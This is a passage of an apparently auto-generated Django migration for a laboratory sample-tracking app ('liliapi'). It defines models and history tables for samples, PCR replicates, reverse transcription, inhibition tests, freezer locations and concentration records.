'unique_together': {('sample', 'analysis_batch')},
},
),
migrations.AddField(
model_name='sample',
name='analysisbatches',
field=models.ManyToManyField(related_name='samples', through='liliapi.SampleAnalysisBatch', to='liliapi.AnalysisBatch'),
),
migrations.AddField(
model_name='sample',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sample_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='sample',
name='filter_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.FilterType'),
),
migrations.AddField(
model_name='sample',
name='matrix',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.Matrix'),
),
migrations.AddField(
model_name='sample',
name='meter_reading_unit',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesmeterunits', to='liliapi.Unit'),
),
migrations.AddField(
model_name='sample',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sample_modifier', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='sample',
name='peg_neg',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='samples', to='liliapi.Sample'),
),
migrations.AddField(
model_name='sample',
name='record_type',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.RecordType'),
),
migrations.AddField(
model_name='sample',
name='sample_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.SampleType'),
),
migrations.AddField(
model_name='sample',
name='samplegroups',
field=models.ManyToManyField(related_name='samples', through='liliapi.SampleSampleGroup', to='liliapi.SampleGroup'),
),
migrations.AddField(
model_name='sample',
name='study',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='samples', to='liliapi.Study'),
),
migrations.AddField(
model_name='sample',
name='total_volume_sampled_unit_initial',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplestvsunits', to='liliapi.Unit'),
),
migrations.CreateModel(
name='ReverseTranscriptionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('template_volume', models.DecimalField(decimal_places=10, default=8.6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('reaction_volume', models.DecimalField(decimal_places=10, default=50, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('rt_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('re_rt_notes', models.TextField(blank=True)),
('ext_pos_rna_rt_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_rna_rt_invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('re_rt', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ReverseTranscription')),
],
options={
'verbose_name': 'historical reverse transcription',
'db_table': 'lili_reversetranscriptionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ReportTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical report type',
'db_table': 'lili_reporttypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ReportType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reporttype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reporttype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_reporttype',
},
),
migrations.CreateModel(
name='ReportFileHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('file', models.TextField(max_length=100, null=True)),
('fail_reason', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('report_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ReportType')),
('status', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Status')),
],
options={
'verbose_name': 'historical report file',
'db_table': 'lili_reportfilehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ReportFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('file', models.FileField(null=True, upload_to=liliapi.models.ReportFile.reportfile_location)),
('fail_reason', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reportfile_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reportfile_modifier', to=settings.AUTH_USER_MODEL)),
('report_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='reportfiles', to='liliapi.ReportType')),
('status', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='reportfiles', to='liliapi.Status')),
],
options={
'db_table': 'lili_reportfile',
'ordering': ['-id'],
},
),
migrations.CreateModel(
name='RecordTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical record type',
'db_table': 'lili_recordtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='PCRReplicateHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('replicate_concentration', models.DecimalField(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('concentration_unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('invalid_override', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('pcrreplicate_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.PCRReplicateBatch')),
('sample_extraction', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleExtraction')),
],
options={
'verbose_name': 'historical pcr replicate',
'db_table': 'lili_pcrreplicatehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='PCRReplicateBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('replicate_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('notes', models.TextField(blank=True)),
('ext_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_invalid', models.BooleanField(default=True)),
('rt_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_invalid', models.BooleanField(default=True)),
('pcr_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_invalid', models.BooleanField(default=True)),
('pcr_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_invalid', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('re_pcr', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.PCRReplicateBatch')),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical pcr replicate batch',
'db_table': 'lili_pcrreplicatebatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddField(
model_name='pcrreplicatebatch',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatches', to='liliapi.Target'),
),
migrations.CreateModel(
name='OtherAnalysisHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('description', models.TextField(blank=True)),
('data', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical other analysis',
'db_table': 'lili_otheranalysishistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='OtherAnalysis',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('description', models.TextField(blank=True)),
('data', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='otheranalysis_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='otheranalysis_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'otheranalyses',
'db_table': 'lili_otheranalysis',
},
),
migrations.CreateModel(
name='NucleicAcidTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical nucleic acid type',
'db_table': 'lili_nucleicacidtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='MatrixHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical matrix',
'db_table': 'lili_matrixhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='InhibitionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('inhibition_date', models.DateField(db_index=True, default=datetime.date.today)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('dilution_factor', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical inhibition',
'db_table': 'lili_inhibitionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddField(
model_name='inhibition',
name='nucleic_acid_type',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType'),
),
migrations.AddField(
model_name='inhibition',
name='sample',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inhibitions', to='liliapi.Sample'),
),
migrations.CreateModel(
name='FreezerLocationHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('rack', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('box', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('row', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spot', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('freezer', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Freezer')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical freezer location',
'db_table': 'lili_freezerlocationhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='FreezerLocation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('rack', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('box', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('row', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spot', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocation_creator', to=settings.AUTH_USER_MODEL)),
('freezer', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocations', to='liliapi.Freezer')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocation_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_freezerlocation',
'unique_together': {('freezer', 'rack', 'box', 'row', 'spot')},
},
),
migrations.CreateModel(
name='FreezerHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('racks', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('boxes', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('rows', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spots', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical freezer',
'db_table': 'lili_freezerhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='FinalSampleMeanConcentrationHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('final_sample_mean_concentration', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical final sample mean concentration',
'db_table': 'lili_finalsamplemeanconcentrationhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='FinalConcentratedSampleVolumeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('final_concentrated_sample_volume', models.DecimalField(decimal_places=100, max_digits=120, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('notes', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('concentration_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ConcentrationType')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
